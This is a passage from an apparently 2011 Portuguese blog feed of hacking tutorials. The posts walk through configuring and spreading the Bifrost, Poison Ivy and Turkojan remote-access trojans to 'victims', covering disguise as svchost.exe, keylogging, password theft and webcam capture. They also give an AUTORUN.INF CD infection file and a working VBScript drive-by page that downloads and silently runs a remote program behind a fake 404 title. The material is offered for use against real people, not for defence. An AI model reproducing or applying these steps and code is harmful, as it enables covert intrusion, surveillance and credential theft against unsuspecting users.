Se vc quiser colocar um tempo para instalação do server mude em “Delayed Connection”, vc pode colocar pra instalar na próxima vez que o computador for iniciado ou um tempo em dias horas e minutos a parti do momento que a vítima executar o server.&lt;br /&gt;
&lt;br /&gt;
d) Miscellaneous&lt;br /&gt;
&lt;br /&gt;
Deixe como está...&lt;br /&gt;
&lt;br /&gt;
&lt;img height="367" src="http://img150.imageshack.us/img150/953/bifrost5uy6.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="443" /&gt;&lt;br /&gt;
&lt;br /&gt;
Em seguida clique em “Build” o seu servidor será criado na pasta onde se encontra o cliente do Bifrost (o cliente é o arquivo: Bifrost.exe).&lt;br /&gt;
Agora é só mandar para a vítima. !&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-3871752954575756155?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/gTEayel4Ir-WuXW8Jb3hZnlofD4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/gTEayel4Ir-WuXW8Jb3hZnlofD4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/gTEayel4Ir-WuXW8Jb3hZnlofD4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/gTEayel4Ir-WuXW8Jb3hZnlofD4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/t4vCMUiQ4xs" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/3871752954575756155/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/tutorial-bifrost-trojan.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/3871752954575756155?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/3871752954575756155?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/t4vCMUiQ4xs/tutorial-bifrost-trojan.html" title="Tutorial Bifrost Trojan" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/tutorial-bifrost-trojan.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY5eyp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-6683208462217274718</id><published>2011-03-22T14:11:00.000-07:00</published><updated>2011-03-24T06:17:23.823-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.823-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Tutorial Poison Ivy 2.2.0</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;1º Abra o Programa&lt;br /&gt;
&lt;br /&gt;
&lt;img height="340" src="http://img260.imageshack.us/img260/4594/imagem1df7.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="501" /&gt;&lt;br /&gt;
&lt;br /&gt;
2º Clque Em Build&lt;br /&gt;
Na Aba Build Faça o Seguinte&lt;br /&gt;
&lt;br /&gt;
1) Em 'DNS/Port' Clike Em 'Add' e Coloque Seu Login No-Ip&lt;br /&gt;
Ou Seu Ip-Fixo Selecione a Porta Que Deseja Usar&lt;br /&gt;
&lt;br /&gt;
2) Em ID Vc Pode Colocar O Nome Da Sua Vitima]&lt;br /&gt;
&lt;br /&gt;
3) Em Password Coloque Uma Senha( No Meu Caso Sera '123'),&lt;br /&gt;
&lt;br /&gt;
4)FileName Coloque o Nome Da Instalacao(eu Sempre Coloco( svchost.exe),&lt;br /&gt;
&lt;br /&gt;
5) (Copy File To) Selecione Uma Das Caixinhas Para qual Pasta o Arquivo Sera Extraido,&lt;br /&gt;
&lt;br /&gt;
6)Em Advanced Deixe Como Esta&lt;br /&gt;
&lt;br /&gt;
7)em Inject Into A Custom Process&lt;br /&gt;
Servira Para Que o Server Se Junte Com um Arquivo(Nosso Meu Caso Sera 'svchost.exe ')&lt;br /&gt;
&lt;br /&gt;
Pronto Em 'ICON' Vc Pode Adicionar Um Icone Para Seu Server&lt;br /&gt;
i Em Seguida Clike Em 'Build'e Salve Seu Server...&lt;br /&gt;
&lt;br /&gt;
Exemplo:&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="Imagem 2" height="373" src="http://img183.imageshack.us/img183/5934/restorc6.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="512" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
3º Na Aba 'Settings' Coloque sua Senha que voce Configurou no Server&lt;br /&gt;
Sua Porta&lt;br /&gt;
&lt;br /&gt;
E o resto deixe como esta e em seguida Clique em SAVE( Para Salvar As Alteracoes)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pronto Seu Poison Ivy Esta Configurado! Depois De Mandar o Server Para Vitima e ela ter executado Na Aba&lt;br /&gt;
'Connections' Estara Suas Vitimas Infectadas Para se conectar a elas e so Clicar duas vezes Em Cima Do Seu ID.&amp;nbsp;&lt;img alt="Laughing" border="0" src="http://www.tudosobrehacker.com/plugins/editors/jce/tiny_mce/plugins/emotions/img/smiley-laughing.gif" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" title="Laughing" /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-6683208462217274718?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/9alJvGjX97F8DkarSvrXSWD7p4k/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/9alJvGjX97F8DkarSvrXSWD7p4k/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/9alJvGjX97F8DkarSvrXSWD7p4k/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/9alJvGjX97F8DkarSvrXSWD7p4k/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/Q-ut7d7BZJ8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/6683208462217274718/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/tutorial-poison-ivy-220.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/6683208462217274718?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/6683208462217274718?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/Q-ut7d7BZJ8/tutorial-poison-ivy-220.html" title="Tutorial Poison Ivy 2.2.0" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/tutorial-poison-ivy-220.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY5eyp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-5579661161584522348</id><published>2011-03-22T14:05:00.001-07:00</published><updated>2011-03-24T06:17:23.823-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.823-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Tutorial Turkojan</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;Depois de baixar o Trojan, instale-o, depois de aberto siga as instruções abaixo.&lt;br /&gt;
&lt;br /&gt;
● Clique em editor&lt;br /&gt;
&lt;br /&gt;
● Agora nessa tela clique em Select IconPara escolher o ícone do server ou se preferir deixe esse mesmo&lt;br /&gt;
&lt;br /&gt;
● Em Victim Name vc devera escolher um nome para vitima que se infectar por o servidor.&lt;br /&gt;
&lt;br /&gt;
● Em DNS-IP vc coloca o seu IP.&lt;br /&gt;
&lt;br /&gt;
● Em 'Port number' deixe como esta.&lt;br /&gt;
&lt;br /&gt;
● Em Connection 'Password' escolha um senha para se conectar com o servidor.&lt;br /&gt;
&lt;br /&gt;
● Em 'Bind server with a file' Para se vc quiser bindar o servidor com algum arquivo.&lt;br /&gt;
&lt;br /&gt;
● Em 'Fake error message' vc podera colocar uma mensagem de erro falsa apos a execusao do servidor.&lt;br /&gt;
&lt;br /&gt;
● Em 'Registry Settings' voce escolhera o nome que vai aparecer no gerenciador de processos.&lt;br /&gt;
&lt;br /&gt;
● Se a opçao 'Pack server' estiver desmarcada marque-a.&lt;br /&gt;
&lt;br /&gt;
● Clique em 'Save' para salvar seu servidor.&lt;br /&gt;
&lt;br /&gt;
Conectando-se Com o Servidor&lt;br /&gt;
&lt;br /&gt;
Depois que você mandar de alguma forma o servidor pra determinada pessoa e ela o&lt;br /&gt;
executar, confira se a senha que você configurou para o servidor corresponde à que&lt;br /&gt;
aparece no campo 'Pass' da interface do programa (recomendo usar a mesma senha&lt;br /&gt;
sempre pra evitar esquecimentos) e clique no botão Active, aparecerá uma pequena&lt;br /&gt;
janelinha no canto direito inferior da tela com uma mensagem: “Vítima is online now”&lt;br /&gt;
que significa que a vítima está online e você poderá se conectar.&lt;br /&gt;
&lt;br /&gt;
Na parte inferior da interface do programa você terá a lista de suas vítimas&lt;br /&gt;
conectadas no momento, para se conectar a uma delas, clique no IP correspondente&lt;br /&gt;
(normalmente mais que dois cliques para dar certo).&lt;br /&gt;
&lt;br /&gt;
Funçao passwords&lt;br /&gt;
&lt;br /&gt;
Passwords indica passwords da maquina&lt;br /&gt;
remote passwords vc obtera passwords do pc,podendo encontrar senhas do ftp&lt;br /&gt;
outlook,etc…&lt;br /&gt;
&lt;br /&gt;
Funçao comunication&lt;br /&gt;
&lt;br /&gt;
Em 'Chat with server' você pode interagir através de textos recebidos instantaneamente pela vítima, onde se abrirá uma pequena janela em seu PC, podendo lhe enviar mensagens também&lt;br /&gt;
&lt;br /&gt;
Em 'Chat Properties' apenas especifique como você irá querer que apareça o seu nome como o da vítima nacaixa de diálogos.&lt;br /&gt;
&lt;br /&gt;
Em 'Other Properties' defina o tamanha em percentual da tela do Chat.&lt;br /&gt;
&lt;br /&gt;
clique em 'Star Chatting With Victim' para iniciar uma conversa&lt;br /&gt;
&lt;br /&gt;
Função File Options&lt;br /&gt;
&lt;br /&gt;
Em 'File Manager' você tem acesso aos arquivos do Explorer do PC da vítima,&lt;br /&gt;
podendo acessar os objetos de inicialização, painel de controle, pasta Windows, e&lt;br /&gt;
demais pastas de forma clara e objetiva.&lt;br /&gt;
&lt;br /&gt;
Na parte inferior da tela que se abre, você terá os botões com determinadas funções&lt;br /&gt;
específicas, como fazer download ou upload de algum arquivo, criar uma nova pasta,&lt;br /&gt;
deletar uma pasta, executar determinado arquivo, entre outros.&lt;br /&gt;
&lt;br /&gt;
Em Find File você poderá fazer uma pesquisa no PC da vítima, especificando a&lt;br /&gt;
unidade e o formato do arquivo a ser encontrado, por exemplo = *.exe; *.ini; *.bat.&lt;br /&gt;
Para isso basta clicar no botão Find File.&lt;br /&gt;
&lt;br /&gt;
Função Screen Options&lt;br /&gt;
&lt;br /&gt;
Em Change Resolution você poderá fazer e alterar uma avaliação sobre as&lt;br /&gt;
resoluções para uma posterior mensagem nada discreta que você poderá mandar&lt;br /&gt;
para a vítima e, em Print Text to Screen você poderá regular as coordenadas, cor do&lt;br /&gt;
fundo e do texto e, também o tamanho da fonte. Você terá a opção de testar, enviar e&lt;br /&gt;
limpar.&lt;br /&gt;
&lt;br /&gt;
Função Mouse Manager&lt;br /&gt;
&lt;br /&gt;
em Mouse Settings onde você poderá controlar o mouse, inverter a&lt;br /&gt;
função dos botões, travar o mouse, deixar o mouse crazy (louco), aumentar ou&lt;br /&gt;
diminuir a velocidade para a funcionalidade de dois cliques do mouse, assim como a&lt;br /&gt;
velocidade de seu movimento, entre outras funções.&lt;br /&gt;
&lt;br /&gt;
Funçao System Information&lt;br /&gt;
&lt;br /&gt;
Estará disponível a funcionalidade Get system Information onde você poderá&lt;br /&gt;
colher as informações do sistema operacional, savar e limpar.&lt;br /&gt;
&lt;br /&gt;
Função Other Settings&lt;br /&gt;
&lt;br /&gt;
Em 'Clipboard Setting' você terá opções de configuração do clipboard, podendo ler,&lt;br /&gt;
editar, limpar, bloquear e desbloquear.&lt;br /&gt;
&lt;br /&gt;
Em 'Time/date Settings' você poderá controlar o horário e a data cujo seu servidor&lt;br /&gt;
estiver conectado.&lt;br /&gt;
&lt;br /&gt;
Em 'IE Settings' você pode definir a página inicial do Internet Explorer, assim como&lt;br /&gt;
fazer o navegador abrir uma pagina de sua preferência e, listando as últimas 25&lt;br /&gt;
páginas visitadas por este mesmo navegador.&lt;br /&gt;
&lt;br /&gt;
Em 'Process Settings' você encontrará os processos rodando na máquina, tendo&lt;br /&gt;
opções para editá-los e encerrá-los se preferir.&lt;br /&gt;
&lt;br /&gt;
Em 'Running Applications' você observará os programas que estão rodando no PC&lt;br /&gt;
da vítima, podendo atualizar ou finalizar determinado programa.&lt;br /&gt;
&lt;br /&gt;
Em 'Services' você observará os serviços referentes ao sistema, podendo atualizar,&lt;br /&gt;
desinstalar, parar e/ou inicializar determinado serviço.&lt;br /&gt;
&lt;br /&gt;
Função Keyboard Manager&lt;br /&gt;
&lt;br /&gt;
Em Keyboard Settings você poderá bloquear ou desbloquear certos comandos do&lt;br /&gt;
teclado, como o comando para abrir o gerenciador de tarefas, a tecla Num-lock,&lt;br /&gt;
Scroll-Lock, entre outras, podendo inclusive habilitar ou desabilitar as luzes do teclado.&lt;br /&gt;
&lt;br /&gt;
Em Send Keys você terá domínio sob o teclado do PC da vítima.(eu adoro essa)xD&lt;br /&gt;
&lt;br /&gt;
Em Online Keylogger você observa tudo o que for digitado enquanto o PC&lt;br /&gt;
conctado à Internet, podendo facilmente reter senhas de todos os gêneros.&lt;br /&gt;
&lt;br /&gt;
Em Offline Keylogger você observa tudo aquilo que for digitado enquanto o PC não&lt;br /&gt;
estiver conectado à Internet.&lt;br /&gt;
&lt;br /&gt;
Função Fun Manager&lt;br /&gt;
&lt;br /&gt;
Em 'Fun Menu' você poderá se divertir com alguns comandos feitos literalmente&lt;br /&gt;
para sacanear a vítima, como tirar ou mostrar a área de trabalho, menu iniciar, ícones,&lt;br /&gt;
travar ou destravar a área de trabalho, o menu iniciar, abrir e fechar o drive de disco&lt;br /&gt;
removível, ligar e desligar o monitor&lt;br /&gt;
&lt;br /&gt;
Em 'ExtraFun' você terá opções como inverter a tela do computador, tanto na&lt;br /&gt;
vertical quanto na horizontal, reiniciar a máquina, desligar ou fazer logoff.&lt;br /&gt;
&lt;br /&gt;
Função Other Options&lt;br /&gt;
&lt;br /&gt;
Em 'Print Text' você poderá imprimir um texto.&lt;br /&gt;
&lt;br /&gt;
Em 'Windows Colors' você poderá definir uma cor para as janelas.&lt;br /&gt;
&lt;br /&gt;
Em 'Registry Editor' você terá acesso ao Editor de registros da máquina&lt;br /&gt;
&lt;br /&gt;
Função Server Settings&lt;br /&gt;
&lt;br /&gt;
Em Server Settings, enquanto conectado você poderá editar as informações a&lt;br /&gt;
respeito da vítima, como trocar a senha e o endereço IP.&lt;br /&gt;
&lt;br /&gt;
Função Image Manager&lt;br /&gt;
&lt;br /&gt;
Em Get Screen Shot você terá possibilidade de ver uma screenshot do monitor da&lt;br /&gt;
vítima, podendo maximizar e configurar sua qualidade.&lt;br /&gt;
&lt;br /&gt;
Em Take Picture from Cam você poderá receber uma foto retirada com a web cam&lt;br /&gt;
da vítima, podendo configurar sua qualidade e ssalvá-la.&lt;br /&gt;
&lt;br /&gt;
Função Tools&lt;br /&gt;
&lt;br /&gt;
Em Process Viewer você observará os processos que estão rodando na máquina,&lt;br /&gt;
podendo finalizá-los.&lt;br /&gt;
&lt;br /&gt;
Na opção Server Editor você criará servidores, devendo-se observar o 1° passo deste tutorial..&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-5579661161584522348?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/b_i89uXQPFxnR5lI9v9zfhdwVSA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/b_i89uXQPFxnR5lI9v9zfhdwVSA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/b_i89uXQPFxnR5lI9v9zfhdwVSA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/b_i89uXQPFxnR5lI9v9zfhdwVSA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/TD0IcnDjOuo" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/5579661161584522348/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/tutorial-turkojan.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/5579661161584522348?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/5579661161584522348?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/TD0IcnDjOuo/tutorial-turkojan.html" title="Tutorial Turkojan" /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/tutorial-turkojan.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY5eyp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-6724494238034213363</id><published>2011-03-22T14:04:00.000-07:00</published><updated>2011-03-24T06:17:23.823-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.823-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Infectando por CD.</title><content type="html">&lt;span class="Apple-style-span" style="color: #e30140; font-family: Tahoma; font-size: small;"&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-size: 12px; line-height: 14px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #5f5f5f; font-weight: normal;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #e30140; font-family: Tahoma; font-size: small;"&gt;&lt;b&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Material:&lt;br /&gt;
-1 CD virgem&lt;br /&gt;
-1 Servidor de Trojan&lt;br /&gt;
-1 Bloco de notas&lt;br /&gt;
&lt;br /&gt;
Simples né?&lt;br /&gt;
&lt;br /&gt;
1ºCrie um bloco de notas, e nele coloque assim:&lt;br /&gt;
&lt;br /&gt;
[AutoRun]&lt;br /&gt;
open=nome_do_seu_server.exe&lt;br /&gt;
icon=nome_do_seu_server.exe,0&lt;br /&gt;
&lt;br /&gt;
2º Agora, salve com o nome de: AUTORUN.INF&lt;br /&gt;
&lt;br /&gt;
3ºGrave os arquivos em um cd&lt;br /&gt;
&lt;br /&gt;
4º Pronto! Quando a vitima colocar o CD no pc, ela irá se infectar, isso porque esse é um comando muito usado para execução automatica de jogos e programas, mas sem uma previa verificação do arquivo fica facil trocar esse "jogo" por um servidor!.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/b&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-6724494238034213363?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/nl8wVEEPzvJu_T9WfrJdAk_C96w/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nl8wVEEPzvJu_T9WfrJdAk_C96w/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/nl8wVEEPzvJu_T9WfrJdAk_C96w/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nl8wVEEPzvJu_T9WfrJdAk_C96w/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/fYGk/~4/QOxTL66k0BA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://headplay.blogspot.com/feeds/6724494238034213363/comments/default" title="Postar comentários" /><link rel="replies" type="text/html" href="http://headplay.blogspot.com/2011/03/infectando-por-cd.html#comment-form" title="0 Comentários" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/6724494238034213363?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5358464197839652771/posts/default/6724494238034213363?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/fYGk/~3/QOxTL66k0BA/infectando-por-cd.html" title="Infectando por CD." /><author><name>HeadPlay</name><uri>http://www.blogger.com/profile/01894610097837927562</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="21" src="http://2.bp.blogspot.com/-q0v3_I2taVA/TYoGfl7v2YI/AAAAAAAAALY/aHemSYz8Fnw/s220/hacker.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://headplay.blogspot.com/2011/03/infectando-por-cd.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEAQnY5eyp7ImA9WhZTGUo.&quot;"><id>tag:blogger.com,1999:blog-5358464197839652771.post-8110405364747421994</id><published>2011-03-22T14:02:00.000-07:00</published><updated>2011-03-24T06:17:23.823-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-24T06:17:23.823-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="*" /><title>Criando um site com um Auto-Infect</title><content type="html">&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: #5f5f5f; font-family: Tahoma; font-size: 12px; line-height: 14px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Esse Tutoutial Vai Mostrar Como executar algum Programa quando a Pessoa entrar no site, ou seja, no seu Site.&lt;br /&gt;
Bom vamos lá então... Esse Documento HTML que irei postar, é um Auto-Executável...&lt;br /&gt;
Codigo:&lt;br /&gt;
&lt;br /&gt;
&lt;em&gt;&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;head&amp;gt;&amp;lt;/head&amp;gt;&lt;br /&gt;
&amp;lt;body&amp;gt;&lt;br /&gt;
&amp;lt;script language="VBScript"&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on error resume next&lt;br /&gt;
&lt;br /&gt;
' due to how ajax works, the file MUST be within the same local domain&lt;br /&gt;
dl = "LINK DO PROGRAMA"&lt;br /&gt;
&lt;br /&gt;
' create adodbstream object&lt;br /&gt;
Set df = document.createElement("object")&lt;br /&gt;
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"&lt;br /&gt;
str="Microsoft.XMLHTTP"&lt;br /&gt;
Set x = df.CreateObject(str,"")&lt;br /&gt;
&lt;br /&gt;
a1="Ado"&lt;br /&gt;
a2="db."&lt;br /&gt;
a3="Str"&lt;br /&gt;
a4="eam"&lt;br /&gt;
str1=a1&amp;amp;a2&amp;amp;a3&amp;amp;a4&lt;br /&gt;
str5=str1&lt;br /&gt;
set S = df.createobject(str5,"")&lt;br /&gt;
S.type = 1&lt;br /&gt;
&lt;br /&gt;
' xml ajax req&lt;br /&gt;
str6="GET"&lt;br /&gt;
x.Open str6, dl, False&lt;br /&gt;
x.Send&lt;br /&gt;
&lt;br /&gt;
' Get temp directory and create our destination name&lt;br /&gt;
fname1="&lt;strong&gt;NOME DO PROGRAMA E A EXTENSÃO"&lt;/strong&gt;&lt;br /&gt;
set F = df.createobject("Scripting.FileSystemObject","")&lt;br /&gt;
set tmp = F.GetSpecialFolder(2) ' Get tmp folder&lt;br /&gt;
fname1= F.BuildPath(tmp,fname1)&lt;br /&gt;
S.open&lt;br /&gt;
' open adodb stream and write contents of request to file&lt;br /&gt;
' like vbs dl+exec code&lt;br /&gt;
S.write x.responseBody&lt;br /&gt;
' Saves it with CreateOverwrite flag&lt;br /&gt;
S.savetofile fname1,2&lt;br /&gt;
&lt;br /&gt;
S.close&lt;br /&gt;
set Q = df.createobject("Shell.Application","")&lt;br /&gt;
Q.ShellExecute fname1,"","","open",0&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;head&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;[rox] || 404 Not Found&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;&lt;br /&gt;
&amp;lt;center&amp;gt;&amp;lt;embed src="/" pluginspage="" type="application/x-shockwave-flash" width="550" height="290"&amp;gt; &amp;lt;/embed&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- &amp;lt;script&amp;gt;location.href='http://google.com'&amp;lt;/script&amp;gt; --&amp;gt;&lt;br /&gt;
&amp;lt;/body&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;/em&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong&gt;Apenas adapte o codigo acima, lembrando Conhecimento nao é crime, nao me responsabilizo com o que voce faz com ele!!&lt;/strong&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5358464197839652771-8110405364747421994?l=headplay.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/uzVS9h8D4Er5QYPxLlkJ_FB9imk/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/uzVS9h8D4Er5QYPxLlkJ_FB9imk/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
